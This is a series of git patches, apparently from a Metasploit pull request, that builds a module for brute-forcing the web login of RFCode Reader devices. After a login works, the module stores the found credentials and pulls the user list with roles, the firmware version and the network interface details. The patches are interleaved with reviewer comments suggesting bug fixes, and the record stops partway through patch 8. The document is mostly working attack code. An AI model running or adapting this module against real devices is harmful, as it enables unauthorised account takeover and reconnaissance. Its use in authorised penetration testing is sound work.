From 6b8e6b3f0c0a09b5f598a632d32cff2e8a053f28 Mon Sep 17 00:00:00 2001
From: Karn Ganeshen
Date: Fri, 7 Jun 2013 23:53:09 +0530
Subject: [PATCH 1/9] Create rfcode_reader_enum.rb Adding new aux - RFCode Reader Web interface Login Brute Force & Config Capture Utility
---
.../scanner/http/rfcode_reader_enum.rb | 193 ++++++++++++++++++
1 file changed, 193 insertions(+)
create mode 100644 modules/auxiliary/scanner/http/rfcode_reader_enum.rb
diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb
new file mode 100644
index 0000000000..dfff2c9621
--- /dev/null
+++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb
@@ -0,0 +1,193 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'RFCode Reader Web interface Login Utility', + 'Description' => %{ + This module simply attempts to login to a RFCode Reader web interface. Please note that + by default there is no authentication. In such a case, password brute force will not be performed. + If there is authentication configured, the module will attempt to find valid login credentials and + capture device information. + }, + 'Author' => + [ + 'Karn Ganeshen ' + ], + 'Version' => '1.0', + 'License' => MSF_LICENSE + + )) + + register_options( + [ + Opt::RPORT(80), + OptString.new('STOP_ON_SUCCESS', [true, 'Stop guessing when a credential works for a host', true]) + ], self.class) + + end + + # + # Info-Only + # Identify logged in user: /rfcode_reader/api/whoami.json?_dc=1369680704481 + # Capture list of users: /rfcode_reader/api/userlist.json?_dc=1370353972710 + # Interface configuration: /rfcode_reader/api/interfacestatus.json?_dc=1369678668067 + # Network configuration: /rfcode_reader/api/netconfigstatus.json?_dc=1369678669208 + # + + def run_host(ip) + if not is_app_rfreader? + print_error("Application does not appear to be RFCode Reader. Module will not continue.") + return + end + + print_status("Checking if authentication is required...") + if not is_auth_required? 
+ print_warning("Application does not require authentication.") + user = '' + pass = '' + + # Collect device platform & configuration info + collect_info(user, pass) + return + end + + print_status("Brute-forcing...") + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + # + # What's the point of running this module if the app actually isn't RFCode Reader? + # + def is_app_rfreader? + res = send_request_raw({'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481'}) + return (res and res.code != 404) + end + + # + # The default install of RFCode Reader app does not require authentication. Instead, it'll log the + # user right in. If that's the case, no point to brute-force, either. + # + def is_auth_required? + user = '' + pass = '' + + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + return (res and res.body =~ /{ }/) ? false : true + end + + # + # Brute-force the login page + # + def do_login(user, pass) + + vprint_status("Trying username:'#{user}' with password:'#{pass}'") + begin + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + if not res or res.code == 401 + vprint_error("FAILED LOGIN. '#{user}' : '#{pass}' with code #{res.code}") + return :skip_pass + else + print_good("SUCCESSFUL LOGIN. 
'#{user}' : '#{pass}'") + + collect_info(user, pass) + + report_hash = { + :host => datastore['RHOST'], + :port => datastore['RPORT'], + :sname => 'RFCode Reader', + :user => user, + :pass => pass, + :active => true, + :type => 'password'} + + report_auth_info(report_hash) + return :next_user + end + rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT + print_error("HTTP Connection Failed, Aborting") + return :abort + end + end + + # + # Collect target info + # + def collect_info(user, pass) + + vprint_status("Collecting information from app as '#{user}':'#{pass}'...") + begin + + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/version.json?_dc=1370460180056', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + print_good("Collecting device platform info...") + print_good(res.body) + + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/userlist.json?_dc=1370353972710', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + print_good("Collecting user list...") + print_good(res.body) + + + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/interfacestatus.json?_dc=1369678668067', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + print_good("Collecting interface info…") + print_good(res.body) + + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/netconfigstatus.json?_dc=1369678669208', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + print_good("Collecting network configuration…") + print_good(res.body) + + + return + end + end +end From eb0ae6ed2759b7c452e516509bc8b29646f22ad2 Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Sat, 8 Jun 2013 01:00:18 +0530 Subject: [PATCH 2/9] Update rfcode_reader_enum.rb Updated as per review comments --- .../scanner/http/rfcode_reader_enum.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) 
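Review bot: In do_login the success branch is taken for every response that is neither nil nor 401, so a 403, 404, 302 or 500 from whoami.json is announced as a valid credential and written to the database via report_auth_info. Only a 200 should count: `if res && res.code == 200` for the good path and `elsif res.nil? || res.code == 401` for the failure path. is_auth_required? has the mirror problem: a nil response (e.g. a timeout after connect) makes it return true and the module proceeds to brute-force a host it cannot talk to; `return false` is not right either, so a nil there should end run_host with an error. The `/{ }/` test also depends on the device emitting exactly one space inside the braces; `/\A\s*\{\s*\}\s*\z/` would survive a serializer change. Both methods are fully contained in this hunk.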
diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index dfff2c9621..a238834d22 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -21,14 +21,14 @@ class Metasploit3 < Msf::Auxiliary This module simply attempts to login to a RFCode Reader web interface. Please note that by default there is no authentication. In such a case, password brute force will not be performed. If there is authentication configured, the module will attempt to find valid login credentials and - capture device information. + capture device information. }, 'Author' => [ 'Karn Ganeshen ' ], 'Version' => '1.0', - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE )) @@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary # def run_host(ip) - if not is_app_rfreader? + unless is_app_rfreader? print_error("Application does not appear to be RFCode Reader. Module will not continue.") return end print_status("Checking if authentication is required...") - if not is_auth_required? + unless is_auth_required? print_warning("Application does not require authentication.") user = '' pass = '' @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("Trying username:'#{user}' with password:'#{pass}'") + vprint_status("Trying username:'#{user.inspect}' with password:'#{pass.inspect}'") begin res = send_request_cgi( { @@ -112,10 +112,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res or res.code == 401 - vprint_error("FAILED LOGIN. '#{user}' : '#{pass}' with code #{res.code}") + vprint_error("FAILED LOGIN. '#{user.inspect}' : '#{pass.inspect}' with code #{res.code}") return :skip_pass else - print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + print_good("SUCCESSFUL LOGIN. '#{user.inspect}' : '#{pass.inspect}'") collect_info(user, pass) 
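Review bot: The rewritten vprint_error line in do_login still interpolates `#{res.code}` inside a branch that is entered precisely when `res` is nil, so a request that yields no response raises NoMethodError instead of logging a failed attempt, and none of the classes in the method's rescue list catch that. Either print it guarded, `vprint_error("FAILED LOGIN. #{user.inspect}:#{pass.inspect} with code #{res ? res.code : 'no response'}")`, or put `return :abort if res.nil?` ahead of the status check and treat it like the connection failures below. The rest of do_login, including its rescue, lies outside this hunk.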
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Auxiliary report_auth_info(report_hash) return :next_user end - rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE print_error("HTTP Connection Failed, Aborting") return :abort end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary # def collect_info(user, pass) - vprint_status("Collecting information from app as '#{user}':'#{pass}'...") + vprint_status("Collecting information from app as '#{user.inspect}':'#{pass.inspect}'...") begin res = send_request_cgi( From ffa18d413f339ec738f040d80e1e554076742f1d Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Sat, 8 Jun 2013 03:21:43 +0530 Subject: [PATCH 3/9] Updated rfcode_reader_enum.rb ... Updated as per review comments. Removed loot of network configuration. Used JSON.parse to bring cleaner loot output Changed some print_goods to vprint_status Changed if not to unless --- .../scanner/http/rfcode_reader_enum.rb | 63 ++++++++----------- 1 file changed, 27 insertions(+), 36 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index a238834d22..17ee980d24 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb 
@@ -9,25 +9,24 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, - 'Name' => 'RFCode Reader Web interface Login Utility', + 'Name' => 'RFCode Reader Web Interface Login Utility', 'Description' => %{ This module simply attempts to login to a RFCode Reader web interface. Please note that - by default there is no authentication. In such a case, password brute force will not be performed. - If there is authentication configured, the module will attempt to find valid login credentials and - capture device information. + by default there is no authentication. In such a case, password brute force will not be performed. + If there is authentication configured, the module will attempt to find valid login credentials and + capture device information. }, 'Author' => [ 'Karn Ganeshen ' ], - 'Version' => '1.0', 'License' => MSF_LICENSE )) @@ -45,7 +44,6 @@ class Metasploit3 < Msf::Auxiliary # Identify logged in user: /rfcode_reader/api/whoami.json?_dc=1369680704481 # Capture list of users: /rfcode_reader/api/userlist.json?_dc=1370353972710 # Interface configuration: /rfcode_reader/api/interfacestatus.json?_dc=1369678668067 - # Network configuration: /rfcode_reader/api/netconfigstatus.json?_dc=1369678669208 # def run_host(ip) 
@@ -146,25 +144,28 @@ class Metasploit3 < Msf::Auxiliary begin res = send_request_cgi( - { - 'uri' => '/rfcode_reader/api/version.json?_dc=1370460180056', - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) + { + 'uri' => '/rfcode_reader/api/version.json?_dc=1370460180056', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) - print_good("Collecting device platform info...") - print_good(res.body) + release_ver = JSON.parse(res.body)["release"] + product_name = JSON.parse(res.body)["product"] + + vprint_status("Collecting device platform info...") + print_good("Release version: '#{release_ver}', Product Name: '#{product_name}'") res = send_request_cgi( - { - 'uri' => '/rfcode_reader/api/userlist.json?_dc=1370353972710', - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) - - print_good("Collecting user list...") - print_good(res.body) + { + 'uri' => '/rfcode_reader/api/userlist.json?_dc=1370353972710', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + userlist = JSON.parse(res.body) + vprint_status("Collecting user list...") + print_good("User list & role: #{userlist}") res = send_request_cgi( { @@ -173,19 +174,9 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user,pass) }) - print_good("Collecting interface info…") - print_good(res.body) - - res = send_request_cgi( - { - 'uri' => '/rfcode_reader/api/netconfigstatus.json?_dc=1369678669208', - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) - - print_good("Collecting network configuration…") - print_good(res.body) - + eth0_info = JSON.parse(res.body)["eth0"] + vprint_status("Collecting interface info...") + print_good("Interface eth0 info: #{eth0_info}") return end From 72a9c8612bdf6d9f5fddd23b69d8d8fdf58b6c36 Mon Sep 17 00:00:00 2001 
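Review bot: The new collect_info code calls `JSON.parse(res.body)` twice on the same version.json body, and does so without checking that `res` is non-nil or that the reply is JSON; a 401 page or any HTML error body raises JSON::ParserError (NoMethodError when `res` is nil) out of a `begin` that has no rescue in this version, which takes down the whole module run. Parse once and guard it: `info = (res && res.code == 200) ? JSON.parse(res.body) : {}` and then read `info['release']` / `info['product']`. `JSON` is also used without a visible `require 'json'`; msf/core presumably pulls it in, but that is worth confirming rather than assuming. collect_info continues past the end of this hunk.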
From: KarnGaneshen Date: Mon, 10 Jun 2013 22:57:00 +0530 Subject: [PATCH 4/9] setting rfcode_reader_enum straight. more updates. --- .../scanner/http/rfcode_reader_enum.rb | 56 ++++++++++++++----- 1 file changed, 42 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index 17ee980d24..628ee76012 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -41,9 +41,10 @@ class Metasploit3 < Msf::Auxiliary # # Info-Only - # Identify logged in user: /rfcode_reader/api/whoami.json?_dc=1369680704481 - # Capture list of users: /rfcode_reader/api/userlist.json?_dc=1370353972710 - # Interface configuration: /rfcode_reader/api/interfacestatus.json?_dc=1369678668067 + # Identify logged in user: /rfcode_reader/api/whoami.json + # Capture list of users: /rfcode_reader/api/userlist.json + # Interface configuration: /rfcode_reader/api/interfacestatus.json + # Device platform details: /rfcode_reader/api/version.json # def run_host(ip) @@ -73,7 +74,14 @@ class Metasploit3 < Msf::Auxiliary # What's the point of running this module if the app actually isn't RFCode Reader? # def is_app_rfreader? - res = send_request_raw({'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481'}) + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/whoami.json', + 'vars_get' => + { + '_dc' => '1369680704481' + } + }) return (res and res.code != 404) end @@ -87,9 +95,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi( { - 'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481', + 'uri' => '/rfcode_reader/api/whoami.json', 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user,pass), + 'vars_get' => + { + '_dc' => '1369680704481' + } }) return (res and res.body =~ /{ }/) ? false : true 
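Review bot: is_app_rfreader? as rewritten here still accepts any response whose code is not 404, so a web server that answers 200 for unknown paths, or one that returns 401 for everything, passes the fingerprint and the module goes on to brute-force it. Tighten it to the two states the rest of the module understands: `return false unless res` followed by `res.code == 401 || (res.code == 200 && res.body =~ /\A\s*\{/)`. That relies on whoami.json answering with a JSON object, which the `/{ }/` test in is_auth_required? already assumes.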
@@ -104,9 +116,13 @@ class Metasploit3 < Msf::Auxiliary begin res = send_request_cgi( { - 'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481', + 'uri' => '/rfcode_reader/api/whoami.json', 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user,pass), + 'vars_get' => + { + '_dc' => '1369680704481' + } }) if not res or res.code == 401 @@ -145,9 +161,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi( { - 'uri' => '/rfcode_reader/api/version.json?_dc=1370460180056', + 'uri' => '/rfcode_reader/api/version.json', 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user,pass), + 'vars_get' => + { + '_dc' => '1370460180056' + } }) release_ver = JSON.parse(res.body)["release"] @@ -158,9 +178,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi( { - 'uri' => '/rfcode_reader/api/userlist.json?_dc=1370353972710', + 'uri' => '/rfcode_reader/api/userlist.json', 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user,pass), + 'vars_get' => + { + '_dc' => '1370353972710' + } }) userlist = JSON.parse(res.body) @@ -169,9 +193,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi( { - 'uri' => '/rfcode_reader/api/interfacestatus.json?_dc=1369678668067', + 'uri' => '/rfcode_reader/api/interfacestatus.json', 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user,pass), + 'vars_get' => + { + '_dc' => '1369678668067' + } }) eth0_info = JSON.parse(res.body)["eth0"] From 5c078f5139f7c8d271e3b0cb0833ff3946365ce4 Mon Sep 17 00:00:00 2001 From: KarnGaneshen Date: Tue, 11 Jun 2013 12:57:26 +0530 Subject: [PATCH 5/9] added report_note to store collected info. removed register rport for 80t. msftidy & module load checked. pushing it up. --- .../scanner/http/rfcode_reader_enum.rb | 30 +++++++++++++++---- 1 file changed, 25 insertions(+), 5 deletions(-) 
diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index 628ee76012..dd6ca1abc8 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -18,10 +18,9 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'RFCode Reader Web Interface Login Utility', 'Description' => %{ - This module simply attempts to login to a RFCode Reader web interface. Please note that - by default there is no authentication. In such a case, password brute force will not be performed. - If there is authentication configured, the module will attempt to find valid login credentials and - capture device information. + This module simply attempts to login to a RFCode Reader web interface. + Please note that by default there is no authentication. In such a case, password brute force will not be performed. + If there is authentication configured, the module will attempt to find valid login credentials and capture device information. }, 'Author' => [ @@ -33,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - Opt::RPORT(80), OptString.new('STOP_ON_SUCCESS', [true, 'Stop guessing when a credential works for a host', true]) ], self.class) @@ -176,6 +174,13 @@ class Metasploit3 < Msf::Auxiliary vprint_status("Collecting device platform info...") print_good("Release version: '#{release_ver}', Product Name: '#{product_name}'") + report_note( + :host => datastore['RHOST'], + :proto => 'tcp', + :port => datastore['RPORT'], + :data => 'Release Version: #{release_ver}, Product: #{product_name}' + ) + res = send_request_cgi( { 'uri' => '/rfcode_reader/api/userlist.json', 
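Review bot: The `:data` string in the new report_note call is single-quoted, so Ruby performs no interpolation and the note stored in the database is the literal text `Release Version: #{release_ver}, Product: #{product_name}`. Use double quotes: `:data => "Release Version: #{release_ver}, Product: #{product_name}"`. The two report_note calls added further down in this commit have the same problem. report_note also requires a `:type` (the DB layer rejects a note without one, as far as I recall), so something like `:type => 'rfcode.version'` belongs in each call.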
@@ -191,6 +196,14 @@ class Metasploit3 < Msf::Auxiliary vprint_status("Collecting user list...") print_good("User list & role: #{userlist}") + report_note( + :host => datastore['RHOST'], + :proto => 'tcp', + :port => datastore['RPORT'], + :data => 'User List & Roles: #{userlist}' + ) + + res = send_request_cgi( { 'uri' => '/rfcode_reader/api/interfacestatus.json', @@ -206,6 +219,13 @@ class Metasploit3 < Msf::Auxiliary vprint_status("Collecting interface info...") print_good("Interface eth0 info: #{eth0_info}") + report_note( + :host => datastore['RHOST'], + :proto => 'tcp', + :port => datastore['RPORT'], + :data => 'Interface eth0: #{eth0_info}' + ) + return end end From 736bf120d93931042c61dac2bdf2499f06201ed3 Mon Sep 17 00:00:00 2001 From: KarnGaneshen Date: Wed, 12 Jun 2013 00:25:50 +0530 Subject: [PATCH 6/9] added sname in report data, corrected :host to rhost, :port to rport. msftidy check. module load check. upping it. --- .../scanner/http/rfcode_reader_enum.rb | 25 +++++++++++-------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index dd6ca1abc8..34fbb06845 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -132,8 +132,8 @@ class Metasploit3 < Msf::Auxiliary collect_info(user, pass) report_hash = { - :host => datastore['RHOST'], - :port => datastore['RPORT'], + :host => rhost, + :port => rport, :sname => 'RFCode Reader', :user => user, :pass => pass, 
@@ -172,12 +172,13 @@ class Metasploit3 < Msf::Auxiliary product_name = JSON.parse(res.body)["product"] vprint_status("Collecting device platform info...") - print_good("Release version: '#{release_ver}', Product Name: '#{product_name}'") + print_good("#{rhost}:#{rport} -> Release version: '#{release_ver}', Product Name: '#{product_name}'") report_note( - :host => datastore['RHOST'], + :host => rhost, :proto => 'tcp', - :port => datastore['RPORT'], + :port => rport, + :sname => "RFCode Reader", :data => 'Release Version: #{release_ver}, Product: #{product_name}' ) @@ -194,12 +195,13 @@ class Metasploit3 < Msf::Auxiliary userlist = JSON.parse(res.body) vprint_status("Collecting user list...") - print_good("User list & role: #{userlist}") + print_good("#{rhost}:#{rport} -> User list & role: #{userlist}") report_note( - :host => datastore['RHOST'], + :host => rhost, :proto => 'tcp', - :port => datastore['RPORT'], + :port => rport, + :sname => "RFCode Reader", :data => 'User List & Roles: #{userlist}' ) @@ -220,10 +222,11 @@ class Metasploit3 < Msf::Auxiliary print_good("Interface eth0 info: #{eth0_info}") report_note( - :host => datastore['RHOST'], + :host => rhost, :proto => 'tcp', - :port => datastore['RPORT'], - :data => 'Interface eth0: #{eth0_info}' + :port => rport, + :sname => "RFCode Reader", + :data => '#{rhost}:#{rport} -> Interface eth0: #{eth0_info}' ) return From 871f1b7c1f836184e096e9106dc4b28b535c3d02 Mon Sep 17 00:00:00 2001 From: KarnGaneshen Date: Wed, 12 Jun 2013 00:53:58 +0530 Subject: [PATCH 7/9] updated prints with ip-port reference. msftidy check. module load check. go rf reader.. --- .../scanner/http/rfcode_reader_enum.rb | 28 +++++++++---------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index 34fbb06845..d4c4b5f498 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb 
+++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -47,13 +47,13 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_app_rfreader? - print_error("Application does not appear to be RFCode Reader. Module will not continue.") + print_error("#{rhost}:#{rport} -> Application does not appear to be RFCode Reader. Module will not continue.") return end - print_status("Checking if authentication is required...") + print_status("#{rhost}:#{rport} -> Checking if authentication is required...") unless is_auth_required? - print_warning("Application does not require authentication.") + print_warning("#{rhost}:#{rport} -> Application does not require authentication.") user = '' pass = '' @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("Brute-forcing...") + print_status("#{rhost}:#{rport} -> Brute-forcing...") each_user_pass do |user, pass| do_login(user, pass) end @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("Trying username:'#{user.inspect}' with password:'#{pass.inspect}'") + vprint_status("#{rhost}:#{rport} -> Trying username:'#{user.inspect}' with password:'#{pass.inspect}'") begin res = send_request_cgi( { @@ -124,10 +124,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res or res.code == 401 - vprint_error("FAILED LOGIN. '#{user.inspect}' : '#{pass.inspect}' with code #{res.code}") + vprint_error("#{rhost}:#{rport} -> FAILED LOGIN - '#{user.inspect}' : '#{pass.inspect}' with code #{res.code}") return :skip_pass else - print_good("SUCCESSFUL LOGIN. '#{user.inspect}' : '#{pass.inspect}'") + print_good("#{rhost}:#{rport} -> SUCCESSFUL LOGIN - '#{user.inspect}' : '#{pass.inspect}'") collect_info(user, pass) 
@@ -144,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary return :next_user end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("HTTP Connection Failed, Aborting") + print_error("#{rhost}:#{rport} -> HTTP Connection Failed, Aborting") return :abort end end @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary # def collect_info(user, pass) - vprint_status("Collecting information from app as '#{user.inspect}':'#{pass.inspect}'...") + vprint_status("#{rhost}:#{rport} -> Collecting information from app as '#{user.inspect}':'#{pass.inspect}'...") begin res = send_request_cgi( @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Auxiliary release_ver = JSON.parse(res.body)["release"] product_name = JSON.parse(res.body)["product"] - vprint_status("Collecting device platform info...") + vprint_status("#{rhost}:#{rport} -> Collecting device platform info...") print_good("#{rhost}:#{rport} -> Release version: '#{release_ver}', Product Name: '#{product_name}'") report_note( @@ -194,7 +194,7 @@ class Metasploit3 < Msf::Auxiliary }) userlist = JSON.parse(res.body) - vprint_status("Collecting user list...") + vprint_status("#{rhost}:#{rport} -> Collecting user list...") print_good("#{rhost}:#{rport} -> User list & role: #{userlist}") report_note( @@ -218,15 +218,15 @@ class Metasploit3 < Msf::Auxiliary }) eth0_info = JSON.parse(res.body)["eth0"] - vprint_status("Collecting interface info...") - print_good("Interface eth0 info: #{eth0_info}") + vprint_status("#{rhost}:#{rport} -> Collecting interface info...") + print_good("#{rhost}:#{rport} -> Interface eth0 info: #{eth0_info}") report_note( :host => rhost, :proto => 'tcp', :port => rport, :sname => "RFCode Reader", - :data => '#{rhost}:#{rport} -> Interface eth0: #{eth0_info}' + :data => 'Interface eth0: #{eth0_info}' ) return From 6188df1b3aab2d06e5b803f25553409ab467cff3 Mon Sep 17 00:00:00 2001 
From: KarnGaneshen Date: Thu, 13 Jun 2013 14:03:55 +0530 Subject: [PATCH 8/9] added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. --- .../scanner/http/rfcode_reader_enum.rb | 39 ++++++++++--------- 1 file changed, 21 insertions(+), 18 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index d4c4b5f498..953124b98e 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -47,13 +47,13 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_app_rfreader? - print_error("#{rhost}:#{rport} -> Application does not appear to be RFCode Reader. Module will not continue.") + print_error("#{rhost}:#{rport} - Application does not appear to be RFCode Reader. Module will not continue.") return end - print_status("#{rhost}:#{rport} -> Checking if authentication is required...") + print_status("#{rhost}:#{rport} - Checking if authentication is required...") unless is_auth_required? - print_warning("#{rhost}:#{rport} -> Application does not require authentication.") + print_warning("#{rhost}:#{rport} - Application does not require authentication.") user = '' pass = '' @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{rhost}:#{rport} -> Brute-forcing...") + print_status("#{rhost}:#{rport} - Brute-forcing...") each_user_pass do |user, pass| do_login(user, pass) end 
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{rhost}:#{rport} -> Trying username:'#{user.inspect}' with password:'#{pass.inspect}'") + vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -124,10 +124,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res or res.code == 401 - vprint_error("#{rhost}:#{rport} -> FAILED LOGIN - '#{user.inspect}' : '#{pass.inspect}' with code #{res.code}") + vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}") return :skip_pass else - print_good("#{rhost}:#{rport} -> SUCCESSFUL LOGIN - '#{user.inspect}' : '#{pass.inspect}'") + print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") collect_info(user, pass) @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary return :next_user end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{rhost}:#{rport} -> HTTP Connection Failed, Aborting") + print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting") return :abort end end @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary # def collect_info(user, pass) - vprint_status("#{rhost}:#{rport} -> Collecting information from app as '#{user.inspect}':'#{pass.inspect}'...") + vprint_status("#{rhost}:#{rport} - Collecting information from app as #{user.inspect}:#{pass.inspect}...") begin res = send_request_cgi( 
@@ -171,15 +171,16 @@ class Metasploit3 < Msf::Auxiliary release_ver = JSON.parse(res.body)["release"] product_name = JSON.parse(res.body)["product"] - vprint_status("#{rhost}:#{rport} -> Collecting device platform info...") - print_good("#{rhost}:#{rport} -> Release version: '#{release_ver}', Product Name: '#{product_name}'") + vprint_status("#{rhost}:#{rport} - Collecting device platform info...") + print_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'") report_note( :host => rhost, :proto => 'tcp', :port => rport, :sname => "RFCode Reader", - :data => 'Release Version: #{release_ver}, Product: #{product_name}' + :data => 'Release Version: #{release_ver}, Product: #{product_name}', + :type => 'Info' ) res = send_request_cgi( @@ -194,15 +195,16 @@ class Metasploit3 < Msf::Auxiliary }) userlist = JSON.parse(res.body) - vprint_status("#{rhost}:#{rport} -> Collecting user list...") - print_good("#{rhost}:#{rport} -> User list & role: #{userlist}") + vprint_status("#{rhost}:#{rport} - Collecting user list...") + print_good("#{rhost}:#{rport} - User list & role: #{userlist}") report_note( :host => rhost, :proto => 'tcp', :port => rport, :sname => "RFCode Reader", - :data => 'User List & Roles: #{userlist}' + :data => 'User List & Roles: #{userlist}', + :type => 'Info' 